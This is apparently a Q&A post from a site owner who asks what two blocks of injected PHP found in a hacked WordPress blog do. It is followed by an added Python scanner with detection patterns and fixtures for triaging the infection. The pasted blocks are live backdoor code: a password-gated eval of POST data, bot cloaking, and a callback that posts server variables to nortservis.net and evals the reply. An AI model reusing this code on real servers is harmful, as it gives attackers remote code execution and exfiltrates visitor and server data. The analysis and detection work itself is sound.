Wednesday, 18 July 2018

Is this PHP? Can it be considered malware? What does it do?

Google Safe Browsing recently detected malware on our WordPress blog. Later we found out someone successfully injected some of our PHP files with blocks of code. I am trying to understand the code. Is it malicious? What does it do? Or what did it do to our users?

Suspected Attack On Our Blog: internet security alert code: 055BCCAC9FEC

Can the two blocks of code below be used in an attack like this?

First:

if (md5($_POST["pf"]) === "93ad003d7fc57aae938ba483a65ddf6d")
{
eval(base64_decode($_POST["cookies_p"]));
}

if(strpos($_SERVER[REQUEST_URI], "post_render") !== false)
{
    $patchedfv = "GHKASMVG";
}

if (isset($_REQUEST[fdgdfgvv]))
{
    if (md5($_REQUEST[fdgdfgvv]) === "93ad003d7fc57aae938ba483a65ddf6d")
    {
        $patchedfv = "SDFDFSDF";
    }
}

if($patchedfv === "GHKASMVG")
{
    @ob_end_clean();
    die;
}

error_reporting(0);

if (!$kjdke_c)
{
    global $kjdke_c;
    $kjdke_c = 1;
    global $include_test;
    $include_test = 1;
    $bkljg = $_SERVER["HTTP_USER_AGENT"];
    $ghfju = array(
        "Google",
        "Slurp",
        "MSNBot",
        "ia_archiver",
        "Yandex",
        "Rambler",
        "bot",
        "spid",
        "Lynx",
        "PHP",
        "WordPress" . "integromedb",
        "SISTRIX",
        "Aggregator",
        "findlinks",
        "Xenu",
        "BacklinkCrawler",
        "Scheduler",
        "mod_pagespeed",
        "Index",
        "ahoo",
        "Tapatalk",
        "PubSub",
        "RSS",
        "WordPress"
    );
    if (!($_GET[df] === "2") and !($_POST[dl] === "2") and ((preg_match("/" . implode("|", $ghfju) . "/i", $bkljg)) or (@$_COOKIE[condtions]) or (!$bkljg) or ($_SERVER[HTTP_REFERER] === "http://" . $_SERVER[SERVER_NAME] . $_SERVER[REQUEST_URI]) or ($_SERVER[REMOTE_ADDR] === "127.0.0.1") or ($_SERVER[REMOTE_ADDR] === $_SERVER[SERVER_ADDR]) or ($_GET[df] === "1") or ($_POST[dl] === "1")))
    {
    }
    else
    {
        foreach($_SERVER as $ndbv => $cbcd)
        {
            $data_nfdh.= "&REM_" . $ndbv . "=\'" . base64_encode($cbcd) . "\'";
        }

        $context_jhkb = stream_context_create(array(
            http => array(
                timeout => 15,
                header => "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.9) Gecko/20100101 Firefox/10.0.9_ Iceweasel/10.0.9\\r\\nConnection: Close\\r\\n\\r\\n",
                method => POST,
                content => "REM_REM=\'1\'" . $data_nfdh
            )
        ));
        $vkfu = file_get_contents("http://nortservis.net/session.php?id", false, $context_jhkb);
        if ($vkfu)
        {
            @eval($vkfu);
        }
        else
        {
            ob_start();
            if (!@headers_sent())
            {
                @setcookie("condtions", "2", time() + 172800);
            }
            else
            {
                echo "<script>document.cookie=\'condtions=2; path=/; expires=" . date(D, d - M - YH:i:s, time() + 172800) . " GMT;\';</script>";
            };

        };

    }

}

Second:

if (md5($_POST["pf"]) === "93ad003d7fc57aae938ba483a65ddf6d")
{
    eval(base64_decode($_POST["cookies_p"]));
}

if (strpos($_SERVER[REQUEST_URI], "post_render") !== false)
{
    $patchedfv = "GHKASMVG";
}

if (isset($_REQUEST[fdgdfgvv]))
{
    if (md5($_REQUEST[fdgdfgvv]) === "93ad003d7fc57aae938ba483a65ddf6d")
    {
        $patchedfv = "SDFDFSDF";
    }
}

if ($patchedfv === "GHKASMVG")
{
    @ob_end_clean();
    die;
}

if (strpos($_SERVER["HTTP_USER_AGENT"], "Win") === false)
{
    $kjdke_c = 1;
}

error_reporting(0);

if (!$kjdke_c)
{
    global $kjdke_c;
    $kjdke_c = 1;
    global $include_test;
    $include_test = 1;
    $bkljg = $_SERVER["HTTP_USER_AGENT"];
    $ghfju = array(
        "Google",
        "Slurp",
        "MSNBot",
        "ia_archiver",
        "Yandex",
        "Rambler",
        "bot",
        "spid",
        "Lynx",
        "PHP",
        "WordPress" . "integromedb",
        "SISTRIX",
        "Aggregator",
        "findlinks",
        "Xenu",
        "BacklinkCrawler",
        "Scheduler",
        "mod_pagespeed",
        "Index",
        "ahoo",
        "Tapatalk",
        "PubSub",
        "RSS",
        "WordPress"
    );
    if (!($_GET[df] === "2") and !($_POST[dl] === "2") and ((preg_match("/" . implode("|", $ghfju) . "/i", $bkljg)) or (@$_COOKIE[condtions]) or (!$bkljg) or ($_SERVER[HTTP_REFERER] === "http://" . $_SERVER[SERVER_NAME] . $_SERVER[REQUEST_URI]) or ($_SERVER[REMOTE_ADDR] === "127.0.0.1") or ($_SERVER[REMOTE_ADDR] === $_SERVER[SERVER_ADDR]) or ($_GET[df] === "1") or ($_POST[dl] === "1")))
    {
    }
    else
    {
        foreach($_SERVER as $ndbv => $cbcd)
        {
            $data_nfdh.= "&REM_" . $ndbv . "=\'" . base64_encode($cbcd) . "\'";
        }

        $context_jhkb = stream_context_create(array(
            http => array(
                timeout => 15,
                header => "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.9) Gecko/20100101 Firefox/10.0.9_ Iceweasel/10.0.9\\r\\nConnection: Close\\r\\n\\r\\n",
                method => POST,
                content => "REM_REM=\'1\'" . $data_nfdh
            )
        ));
        $vkfu = file_get_contents("http://nortservis.net/session.php?id", false, $context_jhkb);
        if ($vkfu)
        {
            @eval($vkfu);
        }
        else
        {
            ob_start();
            if (!@headers_sent())
            {
                @setcookie("condtions", "2", time() + 172800);
            }
            else
            {
                echo "<script>document.cookie=\'condtions=2; path=/; expires=" . date(D, d - M - YH:i:s, time() + 172800) . " GMT;\';</script>";

            };

        };

    }

}

Conclusions: Thanks to @Alex Howansky it is certain that it's malware at this point, and it could have been used to perform any kind of attack (e.g. the one above or random redirects to shady sites).

One more thing: Google detected this malware on our WordPress blog, hosted at /blog. But Google and other search engines are flagging the whole domain as malware, and as a result users can't access our React app hosted at the root domain. Is the whole domain compromised? Is our React app safe?
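The two blocks above share one structure: an md5-gated eval() of a POST parameter (a password-protected backdoor), a crawler/admin cloaking list matched against the User-Agent, a POST of the whole $_SERVER array to a remote session.php whose response is eval()ed, and a "condtions" cookie so a visitor is only served once. Those traits are also what a defender looks for when triaging the rest of a compromised install. The scanner below is an added example, not code from the question or from any project named on the page; it runs the indicator checks over constructed PHP fixtures (the gate hash and callback URL in the fixture are placeholders, not the values from the posted code) and extracts the hash and URL as IoCs for a blocklist or a wider file sweep.

```python
import re
from pathlib import Path
from typing import Dict, List

# Indicator patterns derived from the structure of the injected code in the
# question. Each one is tolerant of whitespace and variable renaming, since
# this family is typically redeployed with fresh random identifiers.
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    # md5($_POST[...]) === "<32 hex>": a password gate on a request parameter
    "md5_gate_on_request_param": re.compile(
        r'md5\s*\(\s*\$_(?:POST|GET|REQUEST)\s*\[[^\]]*\]\s*\)\s*===?\s*"[0-9a-f]{32}"', re.I),
    # eval(base64_decode($_POST[...])): arbitrary code execution from request data
    "eval_of_decoded_request_param": re.compile(
        r'eval\s*\(\s*base64_decode\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b', re.I),
    # file_get_contents("http://...") followed (anywhere later) by eval(
    "remote_fetch_then_eval": re.compile(
        r'file_get_contents\s*\(\s*"https?://[^"]+"[^;]*;\s*.*?eval\s*\(', re.I | re.S),
    # preg_match("/" . implode("|", $list) ...): User-Agent cloaking list
    "crawler_cloaking_list": re.compile(
        r'preg_match\s*\(\s*"/"\s*\.\s*implode\s*\(\s*"\|"', re.I),
    # foreach ($_SERVER as ...) ... base64_encode: environment harvested for the callback
    "server_env_exfil": re.compile(
        r'foreach\s*\(\s*\$_SERVER\s+as\b[^}]*base64_encode', re.I | re.S),
    # error_reporting(0): common in malware but also in legitimate code, so weak on its own
    "error_reporting_disabled": re.compile(r'error_reporting\s*\(\s*0\s*\)', re.I),
}
WEAK_INDICATORS = {"error_reporting_disabled"}

# IoC extractors: the gate hash and the callback URL are worth recording.
HASH_RE = re.compile(r'md5\s*\([^)]*\)\s*===?\s*"([0-9a-f]{32})"', re.I)
URL_RE = re.compile(r'file_get_contents\s*\(\s*"(https?://[^"]+)"', re.I)


def scan_php_source(src: str) -> Dict[str, object]:
    """Return fired indicators, extracted IoCs and a triage verdict for one file's text."""
    hits: List[str] = [name for name, rx in INDICATORS.items() if rx.search(src)]
    iocs = {
        "gate_hashes": sorted(set(HASH_RE.findall(src))),
        "callback_urls": sorted(set(URL_RE.findall(src))),
    }
    strong = set(hits) - WEAK_INDICATORS
    # A gate plus eval of request data, or a remote fetch that is eval()ed,
    # is sufficient on its own to call the file a backdoor.
    if ({"md5_gate_on_request_param", "eval_of_decoded_request_param"} <= strong
            or "remote_fetch_then_eval" in strong):
        verdict = "backdoor"
    elif strong:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"hits": hits, "iocs": iocs, "verdict": verdict}


def scan_tree(root: str) -> Dict[str, Dict[str, object]]:
    """Scan every .php file under root; return only files that are not clean."""
    results = {}
    for path in Path(root).rglob("*.php"):
        report = scan_php_source(path.read_text(errors="replace"))
        if report["verdict"] != "clean":
            results[str(path)] = report
    return results


# Constructed fixture mirroring the shape of the injected code; the hash and
# URL are placeholders (all zeros, a .invalid host), not values from the page.
SAMPLE_BACKDOOR = r'''<?php
if (md5($_POST["pf"]) === "00000000000000000000000000000000") {
    eval(base64_decode($_POST["cookies_p"]));
}
error_reporting(0);
$ua = $_SERVER["HTTP_USER_AGENT"];
$bots = array("Google", "Slurp", "bot");
if (preg_match("/" . implode("|", $bots) . "/i", $ua)) {
} else {
    foreach($_SERVER as $k => $v) { $data .= "&REM_" . $k . "='" . base64_encode($v) . "'"; }
    $ctx = stream_context_create(array("http" => array("method" => "POST", "content" => $data)));
    $r = file_get_contents("http://c2.example.invalid/session.php?id", false, $ctx);
    if ($r) { @eval($r); }
}
'''

# Constructed benign fixture: ordinary theme code that must not fire.
SAMPLE_BENIGN = r'''<?php
$title = get_the_title();
echo esc_html($title);
if (isset($_GET["page"])) { $page = (int) $_GET["page"]; }
'''

if __name__ == "__main__":
    for label, src in (("backdoor fixture", SAMPLE_BACKDOOR), ("benign fixture", SAMPLE_BENIGN)):
        print(label, scan_php_source(src))
```

Run it against a copy of the web root (scan_tree("/path/to/wordpress")) after taking the site offline; anything reported as "backdoor" should be compared against a clean copy of the same plugin or theme file from the vendor, since this malware is injected into otherwise legitimate files rather than dropped as a stand-alone script.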
